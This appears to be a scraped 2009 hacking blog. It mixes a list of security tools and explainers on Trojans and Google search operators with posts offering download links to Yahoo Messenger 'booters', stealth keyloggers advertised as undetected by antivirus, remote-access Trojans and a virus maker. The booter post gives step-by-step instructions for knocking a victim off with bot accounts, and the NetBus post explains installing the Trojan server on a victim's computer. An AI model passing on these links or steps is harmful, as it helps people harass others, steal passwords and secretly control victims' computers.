Kismet :- A powerful wireless sniffer. Kismet is a console based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing, and can even decloak hidden networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps.

Home:- http://www.kismetwireless.net
Latest Release:- Kismet-2008-05-R1
Download:- http://www.kismetwireless.net/download.shtml

Tcpdump :- The classic sniffer for network monitoring and data acquisition. It is great for tracking down network problems or monitoring activity. There is a separate Windows port named WinDump. TCPDump is the source of the Libpcap/WinPcap packet capture library.

Home:- http://www.tcpdump.org
Latest Release:- TCPDUMP 4.0.0
Download:- http://www.tcpdump.org/

Ettercap :- Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like ssh and https). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.

Home:- http://ettercap.sourceforge.net
Latest Release:- Ettercap NG-0.7.3
Download:- http://sourceforge.net/projects/ettercap/

DSniff :- A suite of powerful network auditing and penetration-testing tools. This popular and well-engineered suite by Dug Song includes many tools. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected ssh and https sessions by exploiting weak bindings in ad-hoc PKI. Overall, this is a great toolset. It handles pretty much all of your password sniffing needs.

Home:- http://www.monkey.org
Latest Release:- dsniff-2.3
Download:- http://www.monkey.org/~dugsong/dsniff/

Encryption Tools :-

GnuPG / PGP :- Secure your files and communication with the advanced encryption. PGP is the famous encryption program by Phil Zimmerman which helps secure your data from eavesdroppers and other risks. GnuPG is a very well-regarded open source implementation of the PGP standard (the actual executable is named gpg). While GnuPG is always free, PGP costs money for some uses.

http://www.gnupg.org/
http://www.pgp.com/

OpenSSL :- The premier SSL/TLS encryption library. The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured, and open source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library. The project is managed by a worldwide community of volunteers that use the Internet to communicate, plan, and develop the OpenSSL toolkit and its related documentation.

http://www.openssl.org/

Tor :- An anonymous Internet communication system Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, irc, ssh, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.

http://tor.eff.org/

Stunnel :- A general-purpose SSL cryptographic wrapper. The stunnel program is designed to work as an SSL encryption wrapper between remote client and local or remote server. It can be used to add SSL functionality to commonly used inetd daemons like POP2, POP3, and IMAP servers without any changes in the programs' code.

http://www.stunnel.org/

OpenVPN :- A full-featured SSL VPN solution. OpenVPN is an open-source SSL VPN package which can accommodate a wide range of configurations, including remote access, site-to-site VPNs, WiFi security, and enterprise-scale remote access solutions with load balancing, failover, and fine-grained access-controls. OpenVPN implements OSI layer 2 or 3 secure network extension using the industry standard SSL/TLS protocol, supports flexible client authentication methods based on certificates, smart cards, and/or 2-factor authentication, and allows user or group-specific access control policies using firewall rules applied to the VPN virtual interface. OpenVPN uses OpenSSL as its primary cryptographic library.

http://openvpn.net/

TrueCrypt :- Open-Source Disk Encryption Software for Windows and Linux. TrueCrypt is an excellent open source disk encryption system. Users can encrypt entire filesystems, which are then on-the-fly encrypted/decrypted as needed without user intervention beyond entering their passphrase intially. A clever hidden volume feature allows you to hide a 2nd layer of particularly sensitive content with plausible deniability about whether it exists. Then if you are forced to give up your passphrase, you give them the first-level secret. Even with that, attackers cannot prove that a second level key even exists.

http://www.truecrypt.org/

Viruses Codings

2009-11-30T13:40:00.000+05:30

-: Viruses Codings :-

The ILOVEYOU Worm (VBS/Loveletter)

Mawanella                      E-Mail Worm

File Infecter-3

Flash Drive Virus

HTML Worm

USB Worm

PHP Worm

Redlof (VBS/Redolf.A)

I-worm.Icecubes v 1.05

Kernel.dll

KAK

Clone Virus

Black-Wolf

Download All Yahoo Booters

2009-11-30T02:36:00.001+05:30

Dead Room By Satma

Multi login booter up to 200 , With delay features , For each boot option on this booter has been tested randomly and it works , Anything else the pic says it all.
Download :
http://www.2shared.com/file/4250678/1f985708/Dead_Room_By_Satma.html
http://rapidshare.com/files/162134901/Dead_Room_By_Satma.rar

EX Silent DC V9.0

This will auto refresh your bot after every boot.
You should be able to get anywhere from 5-15 effective dc’s before it stops working.
When it does, just use another bot. You can boot a single person as much as you want as long as you rotate bots.
Will auto save your bot id, bot password, and victim id on exit.
Download :
http://rapidshare.com/files/137368430/EX_Silent_DC.zip.html
http://www.2shared.com/file/3763973/4369b3be/EX_Silent_DC.html
http://www.zshare.net/download/1704930081c2a7f4/

Exploited Y!Messenger Silent Dc V 3.0 By Satma

Download :
http://www.snapdrive.net/qs/01663f5f269c
http://sharebee.com/934f338b
http://w15.easy-share.com/1701762988.html

Yah-Mart Special

YAH-MART SPECIAL: YMCS-CLIENT LAGG :twist:

Download :
http://yourupload.com/files/get/7sHY3UwxSo/ymcs-client-lagg.rar
http://rapidshare.com/files/153908334/YMCS-CLIENT-LAGG.rar.html
http://www.2shared.com/file/4092441/6cdcec80/YMCS-CLIENT-LAGG.html

Dark Booter v3

Dark Booter v3 coded by mohammad

Download :
http://www.2shared.com/file/4186062/b9b41a26/Dark_Booter_V3.html
http://yourupload.com/files/get/zovYrLVrlA
http://www.sendspace.com/file/tte0sp
http://www.snapdrive.net/qs/db94df85d90e
http://rapidshare.com/files/158973020/Dark_Booter_V3.rar.html

How Yahoo Booter Works ?

Yahoo messenger can get into yahoo chat, but in reality, it’s a seperate service…
Yahoo Messenger’s server has a Buffer, this buffer is actually 128k not the 512k.
When the attacker sends multiple packets to you, what you don’t get from the server gets stored in a buffer, in comes a chat packet, the client grabs it, in comes 5 chat packets, you grab the first 3 packets, 2 are left behind on yahoo’s server, you then grab the 2 packets and then the buffer is back to empty.
Actually the booter sends 1k’s worth in 1 packet of PM (instant messaging packets) but instead of sending the 1 packet, the booter builds up 10 pm/im packets.
Then you send it to yahoo 10 loops packets of PMs @ 1k each = 80k in 1 load to yahoo then the booter sends it again, 160k.
Now if you can send 128k’s worth of data, pm packets, chat packets, anything you like to the other user BEFORE the user can get the data out, yahoo will simply disconnect them over 128k why?
Most Probably because the server is instructed to disconnect idle users or users who are no longer online, what’s the point of Keeping someone in yahoo chat if they are not getting the data people are sending them, after 40 minutes of a client sending data yahoo goes, we’ve buffered 128k, the user aint there, kick him…!
In Short, Yahoo Messenger Would Crash if it got anything more than 128k.
Also the connection protocols YMSG and Chat2 which is also a factor. YChat was harder to boot for the simple fact that it lacked in features compared to YMSG.
This is also why YMSG is easier to boot then Chat2. The more features the more ways you can be booted.
Yes there are ways to prevent from being booted…..!

How to Boot Yahoo Messenger ?

1] You need bots ID (100 to 1000 might be enough). Therefore you need to create ID bots using Manual way just like you create Yahoo Id or use Yahoo Messenger ID Creator aka ID Maker. usually, the bots ID stored in notepad aka txt file with a format ID and password like this:
BotIDd:Password
BotID2:Password
BotID3:Passowrd
etc.. (upto 1000-10000 id bots)
2] You need Yahoo Boot Software that work properly.
3] Load you BotID in Yahoo Boot Software by selecting stored BotID in txt file and load in Yahoo Boot Program.
4] Select the Type of your Boot Option
5] Select / Type Target aka Victim Username or Yahoo ID
6] Final steps. Boot him! Done.
For better understanding, here I found Youtube Video tutorial how to boot in Yahoo Messenger.

Black Hole By ReMi

Name : Black-Hole
Coder : -= ReMi =-
Nice One boot booter
Can crush messy & Clients
Next Version Coming Soon
Download :
http://www.2shared.com/file/4782142/d37b66d9/-Black-Hole-_By_-ReMi-.html
http://rapidshare.com/files/193003810/-Black-Hole-_By_-ReMi-.zip
http://www.filefactory.com/file/a04gc0e
http://uploaded.to/?id=owd4dn

Terror Begin

6 YM Option
6 Client Option
1 yahelite Lagger Option
Download :
http://www.2shared.com/file/4227318/60fed6cc/T-Begin1.html
http://rapidshare.com/files/161202363/T-Begin1.zip.html
http://www.4shared.com/file/70005998/bc2973aa/T-Begin1.html

Evil-DisConnect-V1.0 Update V2.0

Download :
http://www.2shared.com/file/3642119/f2d54b3e/Evil_Disconnect_v10_Fixed.html

Download All Keyloggers

2009-11-30T02:29:00.000+05:30

Wireless Keylogger

The WIRELESS KEYLOGGER is a tiny plug-in device that records every keystroke typed on any PC.
It can then be accessed wirelessly to obtain the recorded data.
The WIRELESS KEYLOGGER combines the stealth aspect of a hardware keylogger and the remote monitoring ability of a software keylogger into one great device.
It cannot be detected by any kind of software!
More Info :
http://wirelesskeylogger.com/

Digital Keylogger v3.3

Name: Digital Keylogger
Version: 3.3
Author: Nytro
Released: 1 Februarie 2009
Powered by: Romanian Security Team
Website: http://www.rstcenter.com
Same as Digital Keylogger v3.2 with a few bug fixex, and pretyy UD. Nod32, updated, doesn’t find it. And I think Norton, Avira ( if not packed with UPX ), AVG and Kaspersky too.
Server size:
- packed: 36.0 KB
- unpacked: 112 KB

Optiuni:
- Hidden from Task Manager
- Close Windows Firewall
- Get keylog automaticaly
- Gey keylog manual
- Reverse connection
- Close Y! Messenger to steal password
- Bla bla…
Download :
http://rapidshare.com/files/192360454/Digital_Keylogger_v3.3.exe
http://www.box.net/shared/t38kncldmt
Password: level-23.org

SC-KeLog Pro

SC-KeLog Pro. [Monitor Remote and Local Computer in Stealth]

SC-KeyLog PRO is a powerful digital surveillance monitor that logs computer activity for later review. Allows you to secretly record computer user activities such as e-mails, chat conversations, visited web sites, clipboard usage and more in a protected logfile. SC-KeyLog PRO even captures Windows user logon passwords!
Information is captured completely hidden from the user and you even do not need physical access to the computer to be able to record and view its usage. This program allows you to remotely install the monitoring system through an email attachment without the user recognizing the installation at all.
Features :
* Extensive logging
* Remote installation support
* Password protection
* Easy to use built-in logfile viewer
* Incredibly small deployment package, only 100 Kb
* Sends logfiles by e-mail
* E-mails are sent invisible
* Monitors all users, including Remote Desktop users, VNC clients and others
* Automatic startup
* Custom alert messages
* Bypasses local firewalls
* Export logfiles to HTML files
* Automatic uninstallation
What is recorded?
SC-KeyLog PRO records everything you want to know, including:
* All websites visited
* All chat messages typed
* All e-mails typed
* All passwords used
* All applications
* All keystrokes
* Text copied to clipboard
* All mouse clicks
* And much more!
Download :
http://rapidshare.com/files/34347678/SC_keylogg_3.2_Full.rar

PyKeylogger – Simple Python Keylogger

PyKeylogger is a free open source keylogger written in the python programming language.
It is currently available for Windows (NT/2000 and up), and Linux (using Xlib, so won’t work on the console).
It is primarily designed for personal backup purposes, rather than stealth keylogging. Thus, it does not make explicit attempts to hide its presence from the operating system or the user.
Features :
* Log all keystrokes to disk, to a delimited data file
* Automatically archive logfiles to dated zips
* Automatic log rotation
* Automatically send zipped log archives to specified email address[es] (works with any SMTP server, including GMail and Yahoo Mail secure SMTP servers)
* Takes a partial screenshot, centered at the location of every mouse click.
* Automatically flush write buffer to disk, to minimize data loss in the event of a crash
* Very customizable, through configuration with a .ini text file
* GUI (graphical) control panel for settings and actions (this is now the recommended way to change settings)
* Password protection of control panel
* Passwords are obfuscated in the configuration file, to prevent casual snooping
* Automatically delete log files older than specified age
Download :
http://downloads.sourceforge.net/pykeylogger/pykeylogger-1.0.4_win32.zip
More Info :
http://pykeylogger.sourceforge.net/

Advanced keylogger

Obtain total control over your PC with absolutely invisible Advanced Keylogger, you will be able to check upon your computer usage when you are away.
There is no way to find whether there is a keystroke monitor running, as Advanced Keylogger works in a stealth mode, is absolutely invisible, doesn’t show in Windows Task Manager and randomizes its own file names to be totally undetected in any PC.
Features :
* Absolutely invisible keylogger
* Captures passwords and logins (even Winlogon passwords)
* Keeps track of all keystrokes – logs everything typed in any application
* Records Internet activity
* Keeps visual screen statistics in screenshots
* Monitors instant messaging software – records everything typed on the keyboard
* Monitors text copied and cut to the clipboard
* Randomizes its own file names to be totally undetected in any PC
* Automatically uninstalls itself within time if you wish
* Sends reports secretly to your E-mail
* Works on Windows Vista
Download :
http://rapidshare.com/files/7949377/AdvInvKey17.rar

Download All Trojans

2009-11-30T02:25:00.000+05:30

-:Download All Trojans:-

Spy-Net [RAT] v1.7

Download :
http://www.4shared.com/file/90254050/3988d437/Spy-Net_RAT_v17.html
Password: Spy-Net

Nuclear RAT 2.1.0

* Programmed by: Caesar2k
* Date added / updated: September 4th 2007
* Downloads: 80685
* File size: 1.26MB
* Coded in: Delphi
* Section: Remote Administration Tools & Spy
* Compatibility: Windows NT, 2K, XP, Vista
Download :
http://www.nuclearwintercrew.com/Products-View/21/Nuclear_RAT_2.1.0/

Turkojan 4

Features :
* Reverse Connection
* Remote Desktop(very fast)
* Webcam Streaming(very fast)
* Audio Streaming
* Thumbnail viewer
* Remote passwords
* MSN Sniffer
* Remote Shell
* Web-Site Blocking
* Chat with server
* Send fake messages
* Advanced file manager
* Zipping files&folders
* Find files
* Change remote screen resolution
* Mouse manager
* Information about remote computer
* Clipboard manager
* IE options
* Running Process
* Service Manager
* Keyboard Manager
* Online keylogger
* Offline keylogger
* Fun Menu
* Registry manager
* Invisible in Searching Files/Regedit/Msconfig
* Small Server 100kb
Download :
http://www.4shared.com/file/72543880/bd92d968/TurkojaN_4.html
http://w14.easy-share.com/1702095672.html

Trojan Virus Steals Banking Info

The details of about 500,000 online bank accounts and credit and debit cards have been stolen by a virus described as “one of the most advanced pieces of crimeware ever created”.
The Sinowal trojan has been tracked by RSA, which helps to secure networks in Fortune 500 companies.
RSA said the trojan virus has infected computers all over the planet.
“The effect has been really global with over 2000 domains compromised,” said Sean Brady of RSA’s security division.
He told the BBC: “This is a serious incident on a very noticeable scale and we have seen an increase in the number of trojans and their variants, particularly in the States and Canada.”
The RSA’s Fraud Action Research Lab said it first detected the Windows Sinowal trojan in Feb 2006.
Since then, Mr Brady said, more than 270,000 banking accounts and 240,000 credit and debit cards have been compromised from financial institutions in countries including the US, UK, Australia and Poland.
The lab said no Russian accounts were hit by Sinowal.
Source: BBC News
http://news.bbc.co.uk/2/hi/technology/7701227.stm

TeraBIT Virus Maker 2.8 SE

TeraBIT Virus Maker 2.8 SE
(Backdoor.Win32.VB.bna)

by m_reza00
Written in Visual Basic
Released in September 2007
Made in Iran
dropped files:
c:\WINDOWS\system32\csmm.exe
Size: 16,950 bytes
startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon “Shell”
Old data: Explorer.exe
New data: explorer.exe C:\WINDOWS\system32\csmm.exe
Tested on Windows XP

Download :
http://rapidshare.com/files/96994198/TeraBIT_VM_2_1.8.zip.html

High Anonymous HTTP Proxy

2009-11-30T02:15:00.000+05:30

-:High Anonymous HTTP Proxy:-

The NetBus Trojan

2009-11-30T02:05:00.002+05:30

-: The NetBus Trojan :-

NetBus was written in Delphi by Carl-Fredrik Neikter, a Swedish programmer in March 1998.

It is capable of :--

Open/Close CD-ROM
Show optional BMP/JPG image
Swap mouse buttons
Start optional application
Play a wav file
Control mouse
Show different kind's of messages
Shut down Windows
Download/Upload/Delete files
Go to an optional URL
Send keystrokes and disable keys
Listen for and send keystrokes
Take a screendump
Increase and decrease the sound-volume
Record sounds from the microphone
Make click sounds every time a key is pressed

This utility also has the ability to scan "Class C" addresses by adding "+Number of ports" to the end of the target address. Example: 255.255.255.1+254 will scan 255.255.255.1 through 255.

NetBus 2.0 Pro :- It was completely re-written and re-designed. It now has increased features such as improved GUI for client and server, improved file manager, windows manager, registry manager, plugin manager, capture of web cam images, n...more............!

Following is the stepwise procedure for installation and configuration of NetBus 2.0 Pro (server and client).

1) Download NetBus 2.0 Pro. from here - NB2ProBeta.zip

2) Extract and install properly on your system.

3) After installation you will find the two shortcuts in the NetBus installation directory.

	This is to be executed on victim's system.
	This is to be executed on your system.

4) By Executing the 'NetBus Server' (on victim's computer), you will be greeted by a window as shown in figure (left). Click on 'Settings' button.
Here you can configure server settings such as port no, password, visibility, auto/manual start, etc. as shown in figure (right).

Click on 'OK' button to finish NetBus Server settings.
Then close the NetBus Server window.

5) By executing 'NetBus' (i.e. client)(on your system), you will be greeted by a window as shown below-

6) To add a new host go to the menu 'Host' and then click 'New'. This is as shown in figure (left).
Here you should enter the proper Destination(e.g. 'My Computer'), IP Address(eg. 72.232.50.186), TCP Port(by default 20034), Username/Password(exactly same as that of 'NetBus Server') for target computer.

Click on 'OK' to finish the addition of new host.

7) Now you are ready to connect with target(victim's) computer.
To do so, select the host from main window then go to 'Host' menu and then click 'Connect'.

8) After client get connected with server(target computer), you can use any of the features of 'NetBus Trojan' as listed above. You can see all these tools on 'Toolbar' of NetBus Client.

Popular Trojans

2009-11-30T02:04:00.000+05:30

-: Popular Trojans :-

1) NetBus :-

Latest Version: NetBus 2.10 Pro
Developer: Carl-Fredrik Neikter
Default Port: 20034 (variable)
Language: Delphi
Operating System: Windows 95/98, NT4 or later
Type: Remote Access
Download: NB2ProBeta.zip

2) Back Orifice XP :-

Latest Version: BOXP Beta 7
Developer: Javier Aroche
Default Port: 15380
Language: Microsoft Visual C++ 6.0
Operating System: Windows 95/98/ME/NT/2000/XP
Type: Remote Access
Download: boxp_beta7_bin.zip

3) SubSeven / Sub7 :-

Latest Version: SubSeven 2.2
Developer: Mobman
Default Port: 1080, 1369, 5873, 27374 (variable)
Language: Delphi
Operating System: Windows 95/98/ME/NT/2000
Type: Remote Access, Keylogger, Eavesdropper, Sniffer, Proxy server, FTP server
Download: Subseven.2.2.zip

4) Beast :-

Latest Version: Beast 2.07
Developer: Tataye
Default Port: 6666
Language: Delphi
Operating System: Windows 95/98/ME/NT/2000/XP
Type: Remote Access, Keylogger
Download: Beast_2.07.rar

The Trojan Horse

2009-11-30T02:01:00.000+05:30

-: The Trojan Horse :-

What is a Trojan ?
"A Trojan Horse, or Trojan, is a term used to describe malware that appears, to the user, to perform a desirable function but, in fact, facilitates unauthorized access to the user's computer system". - Wikipedia

"A Trojan horse is an apparently useful program containing hidden functions that can exploit the privileges of the user [running the program], with a resulting security threat.". - CERT Advisory

Types of Trojan :-
The different types of Trojan Horses are as follows-

1) Remote Access Trojans :- Abbreviated as RATs, a Remote Access Trojans are potentially the most damaging, designed to provide the attacker with complete control of the victim's system.

2) Data Sending Trojans :- A type of a Trojan horse that is designed to provide the attacker with sensitive data such as passwords, credit card information, log files, e-mail address or IM contact lists. They could install a keylogger and send all recorded keystrokes back to the attacker.

3) Destructive Trojans :- Once this Trojan is installed on your computer, it will begin to systematically or completely randomly delete information from your computer. This can include files, folders, registry entries, and important system files, which likely to cause the failure of your operating system.

4) Proxy Trojans :- A type of Trojan horse designed to use the victim's computer as a proxy server. This gives the attacker the opportunity to conduct illegal activities, or even to use your system to launch malicious attacks against other networks.

5) FTP Trojans :- A type of Trojan horse designed to open port 21 (FTP) and acts like an FTP server. Once installed, the attacker not only could download/upload files/programs to victim's computer but also install futher malware on your computer.

6) Security Software Disabler Trojan :- A type of Trojan horse designed stop or kill security programs such as an antivirus program or firewall without the user knowing. This Trojan type is normally combined with another type of Trojan as a payload.

7) DoS Attack Trojans :- These trojans are used by the attacker to launch a DoS/DDoS attack against some website or network or any individual. In this case they are well known as "Zombies".

How Trojan Works ?
Trojans typically consist of two parts, a client part and a server part. When a victim (unknowingly) runs a Trojan server on his machine, the attacker then uses the client part of that Trojan to connect to the server module and start using the Trojan. The protocol usually used for communications is TCP, but some Trojans' functions use other protocols, such as UDP, as well. When a Trojan server runs on a victim’s computer, it (usually) tries to hide somewhere on the computer; it then starts listening for incoming connections from the attacker on one or more ports, and attempts to modify the registry and/or use some other auto-starting method.

It is necessary for the attacker to know the victim’s IP address to connect to his/her machine. Many Trojans include the ability to mail the victim’s IP and/or message the attacker via ICQ or IRC. This system is used when the victim has a dynamic IP, that is, every time he connects to the Internet, he is assigned a different IP (most dial-up users have this). ADSL users have static IPs, meaning that in this case, the infected IP is always known to the attacker; this makes it considerably easier for an attacker to connect to your machine.

Most Trojans use an auto-starting method that allows them to restart and grant an attacker access to your machine even when you shut down your computer.

How Trojan Horses Are Installed ?
Infection from Trojans is alarmingly simple. Following are very common ways to become infected that most computer users perform on a very regular basis.

Software Downloads
Websites containing executable content (ActiveX control)
Email Attachments
Application Exploits (Flaws in a web applications)
Social Engineering Attacks

The Removal :-
Antivirus software is designed to detect and delete Trojan horses ideally preventing them from ever being installed.

Privacy Attacks

2009-11-30T01:59:00.003+05:30

-: Privacy Attacks :-

Here attacker uses various automated tools which are freely available on the internet. Some of them are as follows:

1) Trojan :- Trojan is a Remote Administration Tool (RAT) which enable attacker to execute various software and hardware instructions on the target system.

Most trojans consist of two parts -
a) The Server Part :- It has to be installed on the the victim's computer.
b) The Client Part :- It is installed on attacker's system. This part gives attacker complete control over target computer.

Netbus, Girlfriend, sub7, Beast, Back Orifice are some of the popular trojans.

2) Keylogger :- Keyloggers are the tools which enable attacker to record all the keystrokes made by victim and send it's logs secretly to the attacker's e-mail address which is previously set by him.

Almost all the Trojans have keylogging function.

Use of latest updated antirus-firewall, detect the presence of trojan and remove it permanently.

3) Spyware :- Spyware utilities are the malicious programs that spy on the activities of victim, and covertly pass on the recorded information to the attacker without the victim's consent. Most spyware utilities monitor and record the victim's internet-surfing habits. Typically, a spyware tool is built into a host .exe file or utility. If a victim downloads and executes an infected .exe file, then the spyware becomes active on the victim's system.
Spyware tools can be hidden both in .exe files an even ordinary cookie files.
Most spyware tools are created and released on the internet with the aim of collecting useful information about a large number of Internet users for marketing and advertising purposes. On many occasions, attacker also use spyware tools for corporate espionage and spying purposes.

4) Sniffer :- Sniffers were originally developed as a tool for debugging/troubleshooting network problems.
The Ethernet based sniffer works with network interface card (NIC) to capture interprete and save the data packets sent across the network.
Sniffer can turn out to be quite dangerous. If an attacker manages to install a sniffer on your system or the router of your network, then all data including passwords, private messages, company secrets, etc. get captured.

Recommended Tools
Snort	http://www.snort.org
Ethereal	http://www.ethereal.com

Google Hacking

2009-11-30T01:56:00.002+05:30

-: Google Hacking :-

Basic Operators:-
1) And (+) :- This operator is used to include multiple terms in a query which is to be searched in google.
example:- if we type "hacker+yahoo+science" in google search box and click search, it will reveal the results something which are related to all the three words simultaneously i.e. hacker, yahoo and science.

2 ) OR (|) :- The OR operator, represented by symbol( | ) or simply the word OR in uppercase letters, instructs google to locate either one term or another term in a query.

3) NOT :- It is opposite of AND operator, a NOT operator excludes a word from search.
example:- If we want to search websites containing the terms google and hacking but not security then we enter the query like "google+hacking" NOT "security".

Advanced Operators:-
1) Intitle :- This operator searches within the title tags.
examples:- intitle:hacking returns all pages that have the string "hacking" in their title.
intitle:"index of" returns all pages that have string "index of" in their title.
Companion operator:- "allintitle".

2) Inurl :- Returns all matches, where url of the pages contains given word.
example:- inurl:admin returns all matches, where url of searched pages must contains the word "admin".
Companion operator:- "allinurl".

3) Site :- This operator narrows search to specific website. It will search results only from given domain. Can be used to carry out information gathering on specific domain.
example:- site:www.microsoft.com will find results only from the domain www.microsoft.com

4) Link :- This operator allows you to search for pages that links to given website.
example:- link:www.microsoft.com
Here, each of the searched result contains asp links to www.microsoft.com

5) Info :- This operator shows summary information for a site and provides links to other google searches that might pertain to that site.
example:- info:www.yahoo.com

6) Define :- This operator shows definition for any term.
example:- define:security
It gives various definitions for the word "security" in different manner from all over the world.

7) Filetype :- This operator allows us to search specific files on the internet. The supported file types can be pdf, xls, ppt, doc, txt, asp, swf, rtf, etc..
example:- If you want to search for all text documents presented on domain www.microsoft.com then we enter the query something like following.
"inurl:www.microsoft.com filetype:txt"

Some of the most powerful and very effective google search queries
are added on Google Dorks! page.